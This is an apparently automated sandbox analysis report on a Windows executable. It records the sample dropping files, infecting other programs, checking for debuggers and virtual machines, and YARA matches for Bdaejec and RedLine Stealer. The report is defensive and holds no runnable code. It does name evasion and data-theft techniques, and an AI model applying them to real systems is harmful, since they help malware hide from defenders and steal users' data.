Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Memory allocated: 21D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Memory allocated: 2600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Memory allocated: 2400000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

API coverage: 9.8 %

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F41718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00F41754h

1_2_00F41718

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00F429E2

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00F42B8C

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00485044 mov eax, dword ptr fs:[00000030h]	0_2_00485044
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061092B mov eax, dword ptr fs:[00000030h]	0_2_0061092B
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00610D90 mov eax, dword ptr fs:[00000030h]	0_2_00610D90
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0068EF83 push dword ptr fs:[00000030h]	0_2_0068EF83

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree,

0_2_0040ADB0

Enables debug privileges

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CE09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040E61C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00416F6A
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004123F1 SetUnhandledExceptionFilter,	0_2_004123F1
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061E86C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0061E86C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061D059 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0061D059
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006271BA __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006271BA
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00622641 SetUnhandledExceptionFilter,	0_2_00622641

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: GetLocaleInfoA,		0_2_00417A20
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: GetLocaleInfoA,		0_2_00627C70

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00412A15

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F4139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00F4139F

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: IoUNtL.exe PID: 2920, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE
